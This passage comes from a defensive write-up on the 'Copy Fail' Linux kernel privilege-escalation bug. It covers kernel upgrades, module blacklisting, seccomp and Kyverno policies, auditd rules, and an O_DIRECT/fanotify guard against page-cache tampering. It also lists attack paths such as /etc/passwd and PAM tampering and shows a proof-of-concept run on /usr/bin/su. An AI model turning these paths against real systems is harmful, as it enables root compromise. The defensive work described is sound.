modinfo algif_aead 2>/dev/null && echo "==> LOADABLE module" || echo "==> BUILT-IN or not present"

# 3. Check whether mitigations are already present.
# Debian/Ubuntu: kmod mitigation.
grep -r algif_aead /etc/modprobe.d/ 2>/dev/null
# RHEL/CentOS: initcall_blacklist.
cat /proc/cmdline | grep -o 'initcall_blacklist=[^ ]*'

Distribution update commands:

# Debian/Ubuntu:
sudo apt update && sudo apt upgrade
# Alpine:
apk update && apk upgrade
# Arch:
pacman -Syu
# SUSE:
zypper update
# RHEL/CentOS:
sudo dnf update kernel && reboot
# Fedora:
sudo dnf upgrade --refresh && reboot

CISA KEV

The vulnerability was added to the CISA Known Exploited Vulnerabilities catalog on 2026-05-01, with remediation due on 2026-05-15.

7.2 Temporary Mitigation: Disable the Vulnerable Module

If the kernel cannot be upgraded immediately, disable algif_aead as a temporary mitigation. The correct method depends on whether the distribution builds it as a loadable module or built-in code:

Build type Representative distributions How to identify Mitigation
Loadable module (=m) Ubuntu, Debian, Alpine, Arch, SUSE modinfo algif_aead returns output modprobe blacklist or rmmod
Built-in (=y) RHEL, CentOS, Oracle Linux, Fedora, Amazon Linux modinfo algif_aead fails initcall_blacklist kernel parameter

Distributions with a loadable module: Ubuntu, Debian, Alpine, Arch, and SUSE:

echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif_aead.conf
sudo rmmod algif_aead 2>/dev/null || sudo reboot

Ubuntu's kmod security update creates this file automatically.

Distributions with built-in code: RHEL, CentOS, Oracle Linux, Fedora, and Amazon Linux.

For built-in code, rmmod and /etc/modprobe.d/ blacklist files are ineffective:

grep CRYPTO_USER_API_AEAD /boot/config-$(uname -r)
# CONFIG_CRYPTO_USER_API_AEAD=y    <- built in, not a module

rmmod algif_aead 2>&1
# rmmod: ERROR: Module algif_aead is builtin.

Use the initcall_blacklist kernel boot parameter:

# Disable algif_aead initialization.
grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"
reboot

# More aggressive: disable the whole AF_ALG interface.
grubby --update-kernel=ALL --args="initcall_blacklist=af_alg_init"
reboot

Validate mitigation on all distributions:

python3 -c "import socket; socket.socket(38,5,0)" 2>&1
# Expected: OSError: [Errno 97] Address family not supported by protocol
# or:       OSError: [Errno 93] Protocol not supported

Notes

  • These mitigations may affect applications that use kernel-accelerated crypto, such as OpenSSL's afalg engine or IPsec xfrm. Most applications fall back to user-space crypto automatically, so practical impact is usually small.
  • KernelCare users can apply the live patch with kcarectl --update without reboot. Verify with kcarectl --patch-info | grep -i "copy.fail\|algif_aead\|CVE-2026-31431".

7.3 Container Mitigation

If the host kernel has been upgraded to a fixed version (Section 7.1) or the vulnerable module has been disabled (Section 7.2), the vulnerability is eliminated at the root. The container-layer controls below are not strictly required in that case. As defense in depth, however, it is still recommended to block AF_ALG socket creation in containers. The interface has very few legitimate container use cases, and blocking it reduces the attack surface for future bugs in the kernel crypto subsystem as well.

Default security mechanisms do not block it

Older Docker versions before 29.4.2, Kubernetes RuntimeDefault, and the SELinux targeted policy all allow socket(AF_ALG) and splice(). They do not prevent exploitation.

Upgrade the Docker Runtime

Docker 29.4.2 and later updated the default container policy to block AF_ALG socket creation. For Docker users, upgrading is the simplest defense and requires no extra configuration:

docker --version
# Docker version 29.4.3 or later means the defense is built in.

# Validate.
docker run --rm python:3.11-slim python3 -c "
import socket
try:
    socket.socket(38, 5, 0)
    print('[!] FAIL - AF_ALG not blocked')
except OSError as e:
    print(f'[+] AF_ALG blocked: {e}')"

Docker 29.4.2 regression

Docker 29.4.2 tried to block AF_ALG by denying socketcall(2) through seccomp, but that broke 32-bit programs and i386 images such as SteamCMD and Wine. Docker 29.4.3, released on 2026-05-06, fixed the regression by moving enforcement to Docker's own AppArmor/SELinux container profile at the LSM layer. This does not break 32-bit programs. Upgrade directly to 29.4.3 or later.

The SELinux rule here is a Docker-provided deny rule for alg_socket in the container profile. It is not the same as the system default SELinux targeted policy, which does not understand AF_ALG and does not mitigate this issue by itself. On RHEL/CentOS systems, Docker needs "selinux-enabled": true in daemon.json for the SELinux rule to apply. If SELinux is not enabled, Docker falls back to AppArmor rules on distributions such as Ubuntu and Debian.

Kubernetes is not protected by Docker upgrades

Kubernetes RuntimeDefault seccomp profiles are managed independently by kubelet. Upgrading Docker does not change seccomp behavior for Kubernetes containers. Use a custom profile as described below.

Deploying a Custom Seccomp Profile

For Kubernetes clusters or Docker environments that cannot be upgraded, deploy a custom seccomp profile manually. The profile only blocks AF_ALG socket creation where family=38; it does not affect normal TCP/UDP networking. AF_ALG has almost no legitimate use inside most containerized applications.

Custom profile block-af-alg.json:

{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["socket"],
      "action": "SCMP_ACT_ERRNO",
      "errnoRet": 1,
      "args": [
        { "index": 0, "value": 38, "op": "SCMP_CMP_EQ" }
      ]
    }
  ]
}

Cross-distribution applicability

Seccomp-BPF is a Linux kernel feature that has been stable since 3.17. The profile above applies to any Linux distribution as long as the kernel is at least 3.17 and the container runtime supports seccomp. Docker 1.10 and later, containerd, CRI-O, and Podman all support it.

For non-container environments, such as bare metal or VMs, load an equivalent profile with libseccomp at application startup or use systemd's SystemCallFilter= directive.

Manual Docker deployment:

docker run --rm --security-opt seccomp=block-af-alg.json \
  python:3.11-slim python3 -c "
import socket
try:
    socket.socket(38, 5, 0)
    print('[!] FAIL')
except PermissionError as e:
    print(f'[+] AF_ALG blocked: {e}')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('[+] TCP socket OK')
s.close()"
# [+] AF_ALG blocked: [Errno 1] Operation not permitted
# [+] TCP socket OK

Kubernetes deployment:

Pod Security Standards, including Privileged, Baseline, and Restricted, do not restrict AF_ALG. Deploy the custom profile manually:

cp block-af-alg.json /var/lib/kubelet/seccomp/
# k3s path: /var/lib/rancher/k3s/agent/seccomp/

Reference it from the Pod configuration:

spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: block-af-alg.json

Use an admission controller such as Kyverno or OPA/Gatekeeper to enforce the profile for all Pods and avoid omissions:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-seccomp-block-af-alg
spec:
  validationFailureAction: Enforce
  rules:
  - name: check-seccomp
    match:
      any:
      - resources:
          kinds: ["Pod"]
    validate:
      message: "Pod must use block-af-alg seccomp profile (CVE-2026-31431 mitigation)"
      pattern:
        spec:
          securityContext:
            seccompProfile:
              type: "Localhost"
              localhostProfile: "block-af-alg.json"

8. Attack Detection

8.1 Syscall-Level Auditing and Its Limits

The most direct detection idea is to monitor key syscalls in the exploit chain. Auditd can record AF_ALG socket creation:

# Persistent audit rules.
cat > /etc/audit/rules.d/copyfail.rules <<'EOF'
-a always,exit -F arch=b64 -S socket -F a0=38 -k copyfail_af_alg
-a always,exit -F arch=b64 -S splice -k copyfail_splice
EOF
augenrules --load

In container environments, legitimate AF_ALG usage is rare, so Falco and other eBPF tools can raise real-time alerts on AF_ALG socket creation inside containers. On bare metal or VMs, however, legitimate users such as the OpenSSL afalg engine and dm-crypt can produce continuous noise. Even matching the combination of AF_ALG and splice cannot reliably distinguish legitimate crypto operations from exploitation. Opening an AF_ALG socket and calling splice are legal kernel interfaces.

The core limitation is that syscall-based detection cannot be zero-false-positive. It can only say that someone used AF_ALG; it cannot prove that someone exploited Copy Fail. It also has a coverage problem. As Chapter 5 showed, page-cache overwrite is a recurring vulnerability pattern. AF_ALG-specific detection will miss Dirty Frag's AF_KEY path, and splice detection cannot distinguish legitimate zero-copy I/O. A blacklist of specific syscalls will always lag behind new variants.

A better approach is to detect the result, not the technique. For page-cache-only overwrite bugs such as Dirty Pipe, Copy Fail, and Dirty Frag, tampered page cache must differ from the original disk content. That difference is detectable.

8.2 General Detection: Comparing Page Cache with O_DIRECT

The O_DIRECT flag makes read() bypass the page cache and read directly from the block device. Compare an O_DIRECT read with a normal read(). If the results differ, the page cache has been tampered with:

Normal read:  file -> [Page Cache] -> user buffer    <- returns tampered data
O_DIRECT:     file -> [Disk]       -> user buffer    <- returns original data

If the two differ, the Page Cache has been modified illegally.

This method has three important advantages:

  1. Generality. It detects all vulnerabilities that only modify page cache, including Copy Fail, Dirty Pipe, Dirty Frag, and future bugs with the same primitive. It is not tied to any specific attack mechanism. Dirty COW is the exception because it writes modified data back to disk through page writeback; O_DIRECT sees the modified data too, so traditional file-integrity checks such as rpm -V, AIDE, or Tripwire are needed.
  2. Determinism. For files that are not open for writing by any process, a mismatch between page cache and disk is absolutely abnormal. The Linux kernel's deny_write_access() mechanism prevents normal simultaneous write-and-execute situations.
  3. Result-based detection. Even if the attacker uses an unknown vulnerability, any page-cache-only tampering produces a detectable mismatch.

I validated O_DIRECT detection on CentOS 8 with XFS for both overlay2 layer files and host SUID files. Using host /usr/bin/su as an example:

# Copy Fail tampers with the ELF header of /usr/bin/su.
python3 poc_marker.py /usr/bin/su
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef

# O_DIRECT comparison immediately detects the mismatch.
# Page cache [0:16]: deadbeef020101000000000000000000  <- tampered
# O_DIRECT  [0:16]: 7f454c46020101000000000000000000  <- original ELF header from disk
# [ALERT] SUID binary TAMPERED! 4 bytes differ at: [0, 1, 2, 3]

Implementation detail: O_DIRECT requires the memory address and read length to be aligned to the filesystem block size, usually 4096 bytes. Use posix_memalign() to allocate an aligned buffer. ext4, XFS, Btrfs, and overlay2 on top of ext4/XFS support O_DIRECT. tmpfs does not, but tmpfs is less likely to be the primary attack target.

8.3 Runtime Interception: fanotify Guard

O_DIRECT comparison answers whether tampering can be detected. The next question is when to check. Periodic full scans are not immediate, but checking every file open is too expensive.

Linux fanotify provides the FAN_OPEN_EXEC_PERM event on kernel 5.0 and later. When execve() is about to execute a file, the kernel sends a permission request to user space. A user-space program can read the file, perform checks, and respond with FAN_ALLOW or FAN_DENY. Combining O_DIRECT comparison with fanotify gives a real-time execution guard:

Design decisions:

  • Monitor only SUID/SGID files. At startup, scan target directories and build a set of SUID/SGID files. Executions of non-SUID files are allowed immediately with no overhead.
  • Skip root executions. Root already has full privilege and does not need SUID escalation. In a container-escape scenario, the tamperer may be root inside the container, but the victim is usually a normal host user executing a tampered SUID file. The Guard still blocks that case.
  • Kernel compatibility. FAN_OPEN_EXEC_PERM requires kernel 5.0 or later. RHEL 8 has a backport and was verified. On older kernels, fall back to FAN_OPEN_PERM, intercept all open events, and filter in user space. This is slightly more expensive but functionally equivalent.
  • No extra write-fd check is needed. If a package manager is updating a SUID file, the kernel itself rejects execve() with ETXTBSY through deny_write_access(). A legitimate update does not create a false positive execution event.

Experiment result on CentOS 8 with kernel 4.18.0:

2026-05-08 06:57:34 INFO Found 21 SUID/SGID files
2026-05-08 06:57:34 INFO Monitoring mount (FAN_OPEN_EXEC_PERM): /usr
2026-05-08 06:57:34 INFO Guard active [ENFORCE] (event_size=24, check_root=False)

# After Copy Fail tampers with /usr/bin/su, a normal user tries to execute it:
2026-05-08 06:57:38 WARNING [ALERT] BLOCKED pid=2677362 uid=1000 /usr/bin/su
                            (page cache tampered at offset 0)
# User side:
$ /usr/bin/su
bash: /usr/bin/su: Operation not permitted  (exit 126)

The Guard successfully blocks the tampered SUID binary at execve() time and prevents privilege escalation.

Detection Coverage

The fanotify Guard uses FAN_OPEN_EXEC_PERM to intercept execve(). By design, it only covers SUID/SGID binary execution. Compared with the host attack paths in Chapter 5:

Attack path fanotify Guard Periodic O_DIRECT scan Reason
SUID/SGID binary overwrite Yes Yes Real-time block at execve()
/etc/passwd UID tampering No Yes Configuration file read through open() and read()
PAM module authentication bypass No Yes Shared library loaded through dlopen()
Shared-library live patching No Yes Library mapped through mmap(), not execve()
/etc/profile command injection No Yes Login shell reads and sources it
Cron script tampering No Yes Executed by crond, but not a SUID file
ld.so.preload path hijack No Yes Dynamic linker reads it at process startup
Container escape through layer sharing No Yes Scan overlay lower layers periodically

The fanotify Guard addresses the most urgent path: blocking tampered SUID binaries before they can escalate privileges. The other host paths and the container scenarios require periodic O_DIRECT scanning. Recommended scan priority is: PAM modules and shared libraries under /lib64/security/ and /lib64/*.so; critical configuration files such as /etc/passwd, /etc/profile, and /etc/ld.so.preload; cron scripts and container lower layers. For read-only files in lower layers, a page-cache versus disk mismatch is a certain anomaly with no false positives.


9. Conclusion

Copy Fail is a classic cross-subsystem design-assumption conflict. authencesn assumed the output buffer was safe kernel memory. The algif_aead in-place optimization made the output buffer include page-cache pages. splice introduced file data into that path without copying. Each design decision was reasonable in isolation, but together they created a security bug that remained present for nine years.

At the host level, the attack surface extends far beyond the SUID overwrite demonstrated by the public PoC. The experiments confirmed seven independent privilege-escalation paths: /etc/passwd UID tampering with one four-byte write, PAM authentication bypass that accepts any password for root, shared-library live patching without process restart, /etc/profile command injection, cron script tampering, and ld.so.preload path hijacking. These paths are not specific to Copy Fail; they apply to page-cache overwrite vulnerabilities in general. Shared libraries and PAM modules are especially persistent because mmap references prevent drop_caches from evicting the modified pages.

At the container level, Page Cache is global shared state that crosses isolation boundaries. Cross-container page-cache pollution and read-only volume bypass are real. After deeper validation, however, a generic zero-privilege container escape is architecturally infeasible in a standard Kubernetes environment: containerd and runc do not execute snapshot-layer files in the host context. Additional privileged configuration, such as hostPath or CAP_DAC_READ_SEARCH, is needed to turn page-cache tampering into host escape. Docker's docker export can persist tampered data, and docker diff does not reveal it, which makes the bug valuable in supply-chain scenarios.

From a broader view, Copy Fail is one member of the "splice zero-copy plus kernel in-place writeback" family of page-cache overwrite bugs. Dirty Pipe in 2022, Copy Fail in 2026, and Dirty Frag shortly afterward all show the same primitive in different subsystems. Dirty Frag appeared only eight days after the Copy Fail fix, using the same class of primitive elsewhere. Defense should therefore not focus only on AF_ALG; the next variant may come from any zero-copy path that performs in-place writes.

For that reason, detection should move from detecting the technique to detecting the result. O_DIRECT bypasses page cache and reads directly from disk. Comparing it with normal read() detects page-cache tampering for all page-cache-only bugs, including Copy Fail, Dirty Pipe, Dirty Frag, and future variants. Dirty COW remains an exception because it writes changes back to disk and must be detected by traditional file-integrity systems. For SUID/SGID binaries, combining O_DIRECT comparison with fanotify FAN_OPEN_EXEC_PERM allows real-time blocking at execve(). Other targets, such as PAM modules, shared libraries, and configuration files, should be covered by periodic O_DIRECT scans.

Defense and detection recommendations:

  1. Upgrade the kernel. This is the root fix.
  2. Deploy a seccomp profile that blocks AF_ALG in container environments. Docker 29.4.3 and later include this by default.
  3. Deploy a fanotify plus O_DIRECT Guard to block tampered SUID/SGID binaries at execution time.
  4. Periodically scan critical files with O_DIRECT: PAM modules, shared libraries, /etc/passwd, /etc/profile, /etc/ld.so.preload, and container lower layers.
  5. Use Auditd or Falco as baseline telemetry, recording AF_ALG usage as supporting evidence.

The vulnerability details were initially disclosed by Taeyang Lee. This article builds on that disclosure with independent root-cause analysis and experimental validation.


References

Vulnerability Disclosure and Analysis

  • Taeyang Lee, Copy Fail: One-shot local privilege escalation via the Linux crypto API — xint.io
  • NVD, CVE-2026-31431 — nvd.nist.gov
  • Copy Fail official page — copy.fail
  • Microsoft Defender, CVE-2026-31431 Copy Fail vulnerability enables Linux root privilege escalation — microsoft.com
  • CISA Known Exploited Vulnerabilities Catalog — cisa.gov

Kernel Commits

  • a5079d084f8b — 2011, authencesn module introduction
  • 72548b093ee3 — 2017, vulnerability introduced through algif_aead in-place optimization
  • a664bf3d603d — 2026, vulnerability fixed by reverting the in-place behavior

Container Security Responses

  • Juliet, We tested Copy Fail in Kubernetes: PSS Restricted + RuntimeDefault do not block AF_ALG — juliet.sh
  • Stream Security, CVE-2026-31431: how Copy Fail behaves in Kubernetes — stream.security
  • Percivalll, Copy Fail Kubernetes PoC — GitHub
  • Docker seccomp fix, block AF_ALG in v29.4.2 — moby/moby issue
  • Docker 29.4.3 regression fix using AppArmor/SELinux — release notes
  • Sidero Labs / Talos response — siderolabs.com
  • vArmor Copy Fail mitigation rules, AppArmor/BPF — GitHub
  • iwanhae, copyfail-ebpf-k8s — GitHub

Distribution Security Advisories

  • Ubuntu, Fixes available for CVE-2026-31431 (Copy Fail) — ubuntu.com
  • Red Hat, RHSB-2026-02 Cryptographic Subsystem Privilege Escalation — access.redhat.com
  • Debian Security Tracker, CVE-2026-31431 — security-tracker.debian.org
  • SUSE, SUSE responds to the copy.fail vulnerability — suse.com
  • Alpine Linux Security Tracker — security.alpinelinux.org
  • Oracle Linux CVE Tracker — linux.oracle.com
  • AlmaLinux, CVE-2026-31431 Copy Fail — almalinux.org
  • Arch Linux Security Tracker — security.archlinux.org
  • AWS Security Bulletin, CVE-2026-31431 — aws.amazon.com
  • Bottlerocket issue #4821 — GitHub
  • Fedora Discussion, Is Copy Fail patched in Fedora 43? — discussion.fedoraproject.org
  • CloudLinux / KernelCare, Copy Fail live patches — blog.cloudlinux.com

Security Vendor Analysis

  • Palo Alto Unit 42, Copy Fail: What You Need to Know — unit42.paloaltonetworks.com
  • Wiz.io, CopyFail: Linux privilege escalation vulnerability — wiz.io
  • Sysdig, CVE-2026-31431 Copy Fail: Linux kernel flaw lets local users gain root — sysdig.com
  • Kudelski Security — kudelskisecurity.com
  • SentinelOne Vulnerability Database — sentinelone.com
  • Kodem Security, CVE-2026-31431 Remediation Runbook — kodemsecurity.com

Community Discussion and Reporting

  • Hacker News discussion, including mitigation and WSL2 impact — news.ycombinator.com
  • CyberKendra, A 732-byte Python script can get root — cyberkendra.com
  • CVE-2016-5195 Dirty COW — dirtycow.ninja
  • CVE-2017-1000405 Huge Dirty COW — Bindecy
  • CVE-2022-0847 Dirty Pipe — dirtypipe.cm4all.com
  • CVE-2026-43284 and CVE-2026-43500 Dirty Frag — dirtyfrag.io, GitHub PoC, oss-security